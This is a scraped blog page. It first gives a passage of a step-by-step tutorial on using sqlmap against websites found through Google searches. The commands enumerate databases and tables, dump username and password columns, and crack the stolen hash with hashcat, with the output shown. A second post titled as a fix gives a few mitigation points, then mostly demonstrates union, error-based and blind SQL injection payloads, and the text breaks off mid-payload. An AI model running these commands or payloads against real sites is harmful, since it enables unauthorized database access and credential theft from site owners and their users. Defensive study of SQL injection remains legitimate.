the page returns an SQL error, the page is vulnerable to SQLMAP SQL
Injection. If it loads or redirect you to a different page, move on to
the next site in your Google search results page.<br />
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1" class="alignnone size-full wp-image-177" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1014x461xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1.jpg.pagespeed.ic.-og6L92oU1.jpg" height="461" width="1014" /></a><br />
Examples of SQLi Errors from Different Databases and Languages<br />
<h4>
<span id="Microsoft_SQL_Server"><span style="color: #993300;">Microsoft SQL Server</span></span></h4>
<code>Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.</code><br />
Description:
An unhanded exception occurred during the execution of the current web
request. Please review the stack trace for more information about the
error where it originated in the code.<br />
<code>Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.</code><br />
<br />
<h4>
<span id="MySQL_Errors"><span style="color: #993300;">MySQL Errors</span></span></h4>
<code>Warning:
mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/myawesomestore.com/buystuff.php on line 12</code><br />
<code>Error:
You have an error in your SQL syntax: check the manual that corresponds
to your MySQL server version for the right syntax to use near ‘’’ at
line 12</code><br />
<br />
<h4>
<span id="Oracle_Errors"><span style="color: #993300;">Oracle Errors</span></span></h4>
<code>java.sql.SQLException:
ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)</code><br />
<code>Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated</code><br />
<br />
<h4>
<span id="PostgreSQL_Errors"><span style="color: #993300;">PostgreSQL Errors</span></span></h4>
<code>Query failed: ERROR: unterminated quoted string at or near “‘’’”</code><br />
<br />
<h2>
<span id="Step_2_List_DBMS_databases_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 2: List DBMS databases using SQLMAP SQL Injection</span></span></h2>
As
you can see from the screenshot above, I’ve found a SQLMAP SQL
Injection vulnerable website. Now I need to list all the databases in
that Vulnerable database. (this is also called enumerating number of
columns). As I am using SQLMAP, it will also tell me which one is
vulnerable.<br />
<br />
Run the following command on your vulnerable website with.<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs</pre>
In here:<br />
<code>sqlmap </code>= Name of sqlmap binary file<br />
<code>-u </code>= Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)<br />
<code>--dbs </code>= Enumerate DBMS databases<br />
See screenshot below.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2" class="alignnone size-full wp-image-178" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x868xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2.jpg.pagespeed.ic.7xPj7haoxb.jpg" height="868" width="1280" /></a><br />
<br />
This commands reveals quite a few interesting info:<br />
<pre>web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'</pre>
So, we now have two database that we can look into. <code> information_schema </code> is a standard database for almost every MYSQL database. So our interest would be on <code> sqldummywebsite </code> database.<br />
<br />
<h2>
<span id="Step_3_List_tables_of_target_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 3: List tables of target database using SQLMAP SQL Injection</span></span></h2>
Now we need to know how many tables this <code> sqldummywebsite </code> database got and what are their names. To find out that information, use the following command:<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables</pre>
Sweet, this database got 8 tables.<br />
<pre>[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info</pre>
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3" class="alignnone size-full wp-image-179" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x997xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3.jpg.pagespeed.ic.LUlsg-pmHr.jpg" height="997" width="1280" /></a><br />
and of course we want to check whats inside <code> user_info </code> table using SQLMAP SQL Injection as that table probably contains username and passwords.<br />
<br />
<h2>
<span id="Step_4_List_columns_on_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 4: List columns on target table of selected database using SQLMAP SQL Injection</span></span></h2>
Now we need to list all the columns on target table <code> user_info </code> of <code> sqldummywebsite </code> database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:<br />
<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns</pre>
<br />
This returns 5 entries from target table <code> user_info </code> of <code> sqldummywebsite </code> database.<br />
<pre>[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)</pre>
<br />
AHA! This is exactly what we are looking for … target table <code> user_login </code> and <code> user_password </code>.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4" class="alignnone size-full wp-image-180" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x997xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4.jpg.pagespeed.ic.PyB8VcnbX6.jpg" height="997" width="1280" /></a><br />
<br />
<h2>
<span id="Step_5_List_usernames_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection</span></span></h2>
SQLMAP SQL Injection makes is Easy! Just run the following command again:<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump</pre>
<br />
Guess what, we now have the username from the database:<br />
<pre>[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes</pre>
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5" class="alignnone size-full wp-image-181" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x907xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5.jpg.pagespeed.ic.rNofdi-B9v.jpg" height="907" width="1280" /></a><br />
<br />
Almost there, we now only need the password to for this user.. Next shows just that..<br />
<br />
<h2>
<span id="Step_6_Extract_password_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection</span></span></h2>
You’re
probably getting used to on how to use SQLMAP SQL Injection tool. Use
the following command to extract password for the user.<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump</pre>
<br />
TADA!! We have password.<br />
<pre>[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6" class="alignnone size-full wp-image-182" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x939xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6.jpg.pagespeed.ic.QMEokYZHKx.jpg" height="939" width="1280" /></a><br />
<br />
But
hang on, this password looks funny. This can’t be someone’s password..
Someone who leaves their website vulnerable like that just can’t have a
password like that.<br />
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.<br />
I have covered how to decrypt password extensively on this <a href="http://www.darkmoreops.com/2014/08/14/cracking-md5-phpbb-mysql-and-sha1-passwords-with-hashcat/" target="_blank" title="Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux">Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux</a> post. If you’ve missed it, you’re missing out a lot.<br />
<br />
I will cover it in short here but you should really learn how to use hashcat.<br />
<br />
<h2>
<span id="Step_7_Cracking_password"><span style="color: #993300;">Step 7: Cracking password</span></span></h2>
So the hashed password is <code> 24iYBc17xK0e. </code>. How do you know what type of hash is that?<br />
<br />
<h3>
<span id="Step_7a_Identify_Hash_type"><span style="color: #993300;">Step 7.a: Identify Hash type</span></span></h3>
Luckily,
Kali Linux provides a nice tool and we can use that to identify which
type of hash is this. In command line type in the following command and
on prompt paste the hash value:<br />
<pre>hash-identifier</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7" class="alignnone size-full wp-image-183" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/737x493xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7.jpg.pagespeed.ic.Yo2op9uxYb.jpg" height="493" width="737" /></a><br />
Excellent. So this is DES(Unix) hash.<br />
<br />
<h3>
<span id="Step_7b_Crack_HASH_using_cudahashcat"><span style="color: #993300;">Step 7.b: Crack HASH using cudahashcat</span></span></h3>
First of all I need to know which code to use for DES hashes. So let’s check that:<br />
<pre>cudahashcat --help | grep DES</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8" class="alignnone size-full wp-image-184" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/737x155xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8.jpg.pagespeed.ic.gxQxKdwd8_.jpg" height="155" width="737" /></a><br />
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.<br />
I
am running a Computer thats got NVIDIA Graphics card. That means I will
be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so
I will be using oclHashcat on my laptop. If you’re on VirtualBox or
VMWare, neither cudahashcat nor oclhashcat will work. You must install
Kali in either a persisitent USB or in Hard Disk. Instructions are in
the website, search around.<br />
I saved the hash value <code> 24iYBc17xK0e. </code> in <code> DES.hash </code> file. Following is the command I am running:<br />
<pre>cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9" class="alignnone size-full wp-image-185" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1004x810xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9.jpg.pagespeed.ic.qG0lcBYYxB.jpg" height="810" width="1004" /></a><br />
Interesting
find: Usuaul Hashcat was unable to determine the code for DES hash.
(not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found
and cracked the key.<br />
Anyhow, so here’s the cracked password: abc123. <code> 24iYBc17xK0e.:abc123 </code><br />
Sweet, we now even have the password for this user.<br />
<br />
<br />
Note : If you were using kali linux 2.0 then cudahashcat would be "hashcat"<br />
<br />
source : darkmeops,owsap,stackoverflow<br />
hope it helps <br />
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com40tag:blogger.com,1999:blog-4509349481580895365.post-70250783012100635482015-08-28T11:56:00.000+05:302015-08-28T11:56:13.307+05:30How to fix sql injection ?<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
In my previous post i explained what is sql injection,now in this article i deal with how to fix the sql injection..<br />
<br />
In general the precautions need to be taken were :<br />
<ul style="text-align: left;">
<li>You can prevent SQL injection if you adopt an input validation
technique in which user input is authenticated against a set of defined
rules for length, type and syntax and also against business rules.</li>
<li>You should ensure that users with the permission to access the
database have the least privileges. Additionally, do not use system
administrator accounts like “sa” for web applications. Also, you should
always make sure that a database user is created only for a specific
application and this user is not able to access other applications.
Another method for preventing SQL injection attacks is to remove all
stored procedures that are not in use.</li>
<li>Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.</li>
<li>Show care when using stored procedures since they are generally safe
from injection. However, be careful as they can be injectable (such as
via the use of exec() or concatenating arguments within the stored
procedure). </li>
</ul>
</div>
<br />
SQL injection is a particularly interesting risk for a few different reasons:<br />
<ol>
<li>It’s
getting increasingly harder to write vulnerable code due to frameworks
that automatically parameterise inputs – yet we still write bad code.</li>
<li>You’re not necessarily in the clear just because you use stored procedures or a shiny ORM (you’re aware that <a href="http://www.troyhunt.com/2012/12/stored-procedures-and-orms-wont-save.html">SQLi can still get through these</a>, right?) – we still build vulnerable apps around these mitigations.</li>
<li>It’s
easily detected remotely by automated tools which can be orchestrated
to crawl the web searching for vulnerable sites – yet we’re still
putting them out there.</li>
</ol>
It remains <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">number one on the OWASP Top 10</a>
for a very good reason – it’s common, it’s very easy to exploit and the
impact of doing so is severe. One little injection risk in one little
feature is often all it takes to disclose every piece of data in the
whole system – and I’m going to show you how to do this yourself using a
raft of different techniques.<br />
I demonstrated how to protect against SQLi a couple of years back when I wrote about <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">the OWASP Top 10 for .NET developers</a>
so I’m not going to focus on mitigation here, this is all about
exploiting. But enough of the boring defending stuff, let’s go break
things!<br />
<a href="https://www.blogger.com/null" name="more"></a> <br />
<h4>
All your datas are belong to us (if we can break into the query context)</h4>
Let’s do a quick recap on what it is that makes SQLi possible. In a nutshell, it’s about breaking out of the <i>data</i> context and entering the <i>query</i>
context. Let me visualise this for you; say you have URL that includes a
query string parameter such as “id=1” and that parameter makes its way
down into a SQL query such as this:<br />
<div align="left">
<img alt="SELECT * FROM Widget WHERE ID = 1" border="0" src="http://lh3.ggpht.com/-v8wf12yBReA/Ufd7GKiDAwI/AAAAAAAAFik/h1aZURZ2j7Q/Untitled-12.png?imgmax=800" height="103" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="632" /></div>
The entire URL probably looked something like this:<br />
<img alt="http://widgetshop.com/Widget/?id=1" border="0" src="http://lh3.ggpht.com/-yJGNQFXQ8Jg/Ufd7Gs6hNPI/AAAAAAAAFis/EMvlU6I2FuQ/Untitled-22.png?imgmax=800" height="110" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="650" /><br />
Pretty
basic stuff, where it starts to get interesting is when you can
manipulate the data in the URL such that it changes the value passed to
the query. Ok, changing “1” to “2” will give you a different widget and
that’s to be expected, but what if you did this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 or 1=1</span></u><br />
That might then persist through to the database server like so:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: grey;">* </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">ID </span><span style="color: grey;">= </span>1 <span style="color: grey;">OR </span>1<span style="color: grey;">=</span>1
</pre>
What this tells us is that the data is not being sanitised – in the
examples above the ID should clearly be an integer yet the value “1 OR
1=1” has been accepted. More importantly though, because this data has
simply been appended to the query <i>it has been able to change the function of the statement</i>. Rather than just selecting a single record, this query will now select <i>all</i> records as the “1=1” statement will always be true. Alternatively, we could force the page to return <i>no</i>
records by changing “or 1=1” to “and 1=2” as it will always be false
hence no results. Between these two alternatives we can easily assess if
the app is at risk of an injection attack.<br />
This is the essence of SQL injection – manipulating query execution
with untrusted data – and it happens when developers do things like
this:<br />
<span style="background: white; color: black;">query = </span><span style="background: white; color: #a31515;">"SELECT * FROM Widget WHERE ID = "</span><span style="background: white; color: black;">+ Request.QueryString[</span><span style="background: white; color: #a31515;">"ID"</span><span style="background: white; color: black;">];</span><span style="background: white; color: green;">// Execute the query...</span><br />
Of course what they should be doing is parameterising the untrusted data but I’m not going to go into that here (refer back to <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">part one of my OWASP series</a> for more info on mitigation), instead I want to talk more about exploiting SQLi.<br />
Ok, so that background covers how to demonstrate that a risk is
present, but what can you now do with it? Let’s start exploring some
common injection patterns.<br />
<h4>
Joining the dots: Union query-based injection</h4>
Let’s take an example where we expect a set of records to be returned
to the page, in this case it’s a list of widgets of “TypeId” 1 on a URL
like this:<br />
<span style="color: blue;"><u>http://widgetshop.com/Widgets/?TypeId=1</u></span><br />
The result on the page then looks like so:<br />
<img alt="3 widgets returned to the page" border="0" src="http://lh3.ggpht.com/-g7i0u59D7lE/Ufd7HFnj82I/AAAAAAAAFi0/GcgJwfnJYIQ/image6.png?imgmax=800" height="117" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="68" /><br />
We’d expect that query to look something like this once it hits the database:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: teal;">Name </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">TypeId </span><span style="color: grey;">= </span>1
</pre>
But if we can apply what I’ve outlined above, namely that we might be
able to just append SQL to the data in the query string, we might be
able to do something like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?TypeId=1 union all select name from sysobjects where xtype='u'</span></u><br />
Which would then create a SQL query like so:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: teal;">Name </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">TypeId </span><span style="color: grey;">= </span>1 <span style="color: blue;">union </span><span style="color: grey;">all </span><span style="color: blue;">select </span><span style="color: teal;">name </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u'
</span></pre>
Now keep in mind that the sysobjects table is the one that lists all
the objects in the database and in this case we’re filtering that list
by xtype “u” or in other words, user tables. When an injection risk is
present that would mean the following output:<br />
<img alt="3 widgets returned to the page followed by 2 internal table names" border="0" src="http://lh5.ggpht.com/-A6YoNxkRaqc/Ufd7HrZDOXI/AAAAAAAAFi8/GfPVE2fE21E/image9.png?imgmax=800" height="187" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="66" /><br />
This is what’s referred to as a union query-based injection attack as
we’ve simply appended an additional result set to the original and its
made its way out directly into the HTML output – easy! Now that we know
there’s a table called “User” we could do something like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?TypeId=1 union all select password from [user]</span></u><br />
SQL Server gets a bit uppity if the table name of “user” is not
enclosed in square brackets given the word has other meanings in the DB
sense. Regardless, here’s what that gives us:<br />
<img alt="3 widgets returned to the page followed by a password" border="0" src="http://lh6.ggpht.com/-vJk-tgqAQpg/Ufd7IFPK7lI/AAAAAAAAFjE/uhgNNX-YgWY/image2.png?imgmax=800" height="148" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="89" /><br />
Of course the UNION ALL statement only works when the first SELECT
statement has the same number of columns as the second. That’s easily
discoverable though, you just try going with a bit of ”union all select
‘a’” then if that fails “union all select ‘a’, ‘b’” and so on. Basically
you’re just guessing the number of columns until things work.<br />
We could go on and on down this path and pull back all sorts of other
data, let’s move on to the next attack though. There are times when a
union-based attack isn’t going to play ball either due to sanitisation
of the input or how the data is appended to the query or even how the
result set is displayed to the page. To get around that we’re going to
need to get a bit more creative.<br />
<h4>
Making the app squeal: Error-based injection</h4>
Let’s try another pattern – what if we did this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 or x=1</span></u><br />
Hang on, that’s not valid SQL syntax, the “x=1” piece won’t compute,
at least not unless there’s a column called “x” so won’t it just throw
an exception? Precisely, in fact it means you’ll see an exception like
this:<br />
<img alt="Invalid column name 'x'" border="0" src="http://lh6.ggpht.com/-iSzrFMeO-dw/Ufd7InmwlzI/AAAAAAAAFjM/u-o_hoEoAuM/image14.png?imgmax=800" height="187" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="845" /><br />
This an ASP.NET error and other frameworks have similar paradigms but
the important thing is that the error message is disclosing information
about the internal implementation, namely that there is no column
called “x”. Why is this important? It’s fundamentally important because
once you establish that an app is leaking SQL exceptions, you can do
things like this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=convert(int,(select
top 1 name from sysobjects where id=(select top 1 id from (select top 1
id from sysobjects where xtype='u' order by id) sq order by id DESC)))</span></u> <br />
That’s a lot to absorb and I’ll come back to it in more detail, the
important thing is though that it will yield this result in the browser:
<br />
<img alt="Conversion failed when converting the varchar value 'Widget' to data type int." border="0" src="http://lh3.ggpht.com/-mM4agaXM6Cg/Ufd7JQvO_fI/AAAAAAAAFjU/tmIarbT7t_w/image17.png?imgmax=800" height="184" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
And there we have it, we’ve now discovered that there is a table in
the database called “Widget”. You’ll often see this referred to as
“Error-based SQL injection” due to the dependency on internal errors.
Let’s deconstruct the query from the URL:<br />
<pre class="code"><span style="color: magenta;">convert</span><span style="color: grey;">(</span><span style="color: blue;">int</span><span style="color: grey;">, (
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">name </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">DESC
</span><span style="color: grey;">)
)
)
</span></pre>
Working from the deepest nesting up, get the first record ID from the
sysobjects table after ordering by ID. From that collection, get the <i>last</i>
ID (this is why it orders in descending) and pass that into the top
select statement. That top statement is then only going to take the
table name <i>and try to convert it to an integer</i>. The conversion
to integer will almost certainly fail (please people, don’t name your
tables “1” or “2” or any other integer for that matter!) and that
exception then discloses the table name in the UI.<br />
Why three select statements? Because it means we can go into that
innermost one and change “top 1” to “top 2” which then gives us this
result:<br />
<img alt="Conversion failed when converting the varchar value 'User' to data type int." border="0" src="http://lh4.ggpht.com/-GJZJi34IK1Q/Ufd7J5OtHmI/AAAAAAAAFjc/XnioL8T3rvo/image20.png?imgmax=800" height="185" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
Now we know that there’s a table called “User” in the database. Using
this approach we can discover all the column names of each table (just
apply the same logic to the syscolumns table). We can then extend that
logic even further to select data from table columns:<br />
<img alt="Conversion failed when converting the varchar value 'P@ssw0rd' to data type int." border="0" src="http://lh5.ggpht.com/-QDCJLdU038g/Ufd7KXKELeI/AAAAAAAAFjk/XwdEg1W2yyI/image26.png?imgmax=800" height="184" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
In the screen above, I’d already been able to discover that there was
a table called “User” and a column called “Password”, all I needed to
do was select out of that table (and again, you can enumerate through
all records one by one with nested select statements), and cause an
exception by attempting to convert the string to an int (you can always
append an alpha char to the data if it <i>really is</i> an int then
attempt to convert the whole lot to an int which will cause an
exception). If you want to get a sense of just how easy this can be, I
recorded a <a href="http://www.troyhunt.com/2012/10/hacking-is-childs-play-sql-injection.html">little video last year where I teach my 3 year old to automate this with Havij</a> which uses the technique.<br />
But there’s a problem with all this – it was only possible because
the app was a bit naughty and exposed internal error messages to the
general public. In fact the app quite literally <i>told us</i> the
names of the tables and columns and then disclosed the data when we
asked the right questions, but what happens when it doesn’t? I mean what
happens when the app is correctly configured so as not to leak the
details of internal exceptions?<br />
This is where we get into “blind” SQL injection which is the genuinely interesting stuff.<br />
<h4>
Hacking blind</h4>
In the examples above (and indeed in many precedents of successful
injection attacks), the attacks are dependent on the vulnerable app
explicitly disclosing internal details either by joining tables and
returning the data to the UI or by raising exceptions that bubble up to
the browser. Leaking of internal implementations is always a bad thing
and as you saw earlier, security misconfigurations such as this can be
leveraged to disclose more than just the application structure, you can
actually pull <i>data</i> out through this channel as well.<br />
A correctly configured app <i>should</i> return a message more akin to this one here when an <i>unhandled</i> exception occurs:<br />
<img alt="Error. An error occurred while processing your request." border="0" src="http://lh5.ggpht.com/-IN_JPtT0ZVc/Ufd7Ky6aXZI/AAAAAAAAFjs/cKXM5z4S7SQ/image29.png?imgmax=800" height="255" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="845" /><br />
This is the default error page from a brand new ASP.NET app with
custom errors configured but again, similar paradigms exist in other
technology stacks. Now this page is exactly the same as the earlier ones
that showed the internal SQL exceptions but rather than letting them
bubble up to the UI they’re being hidden and a friendly error message
shown instead. Assuming we also couldn’t exploit a union-based attack,
the SQLi risk is entirely gone, right? Not quite…<br />
Blind SQLi relies on us getting a lot more <i>implicit</i> or in
other words, drawing our conclusions based on other observations we can
make about the behaviour of the app that aren’t quite as direct as
telling us table names or showing column data directly in the browser by
way of unions or unhandled exceptions. Of course this now begs the
question – how can we make the app behave in an observable fashion such
that it discloses the information we had earlier without explicitly
telling us?<br />
We’re going to look at two approaches here: boolean-based and time-based.<br />
<h4>
Ask, and you shall be told: Boolean-based injection</h4>
This all comes down to asking the right questions of the app. Earlier
on, we could explicitly ask questions such as “What tables do you have”
or “What columns do you have in each table” and the database would
explicitly tell us. Now we need to ask a little bit differently, for
example like this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 and 1=2</span></u><br />
Clearly this equivalency test can never be true – one will never be
equal to two. How an app at risk of injection responds to this request
is the cornerstone of blind SQLi and it can happen in one of two
different ways.<br />
Firstly, it might just throw an exception if no record is returned. Often developers will <i>assume</i>
that a record referred to in a query string exists because it’s usually
the app itself that has provided the link based on pulling it out of
the database on another page. When there’s no record returned, things
break. Secondly, the app <i>might not</i> throw an exception but then
it also won’t display a record either because the equivalency is false.
Either way, the app is implicitly telling us that no records were
returned from the database.<br />
Now let’s try this:<br />
<pre class="code">1 <span style="color: grey;">and
(
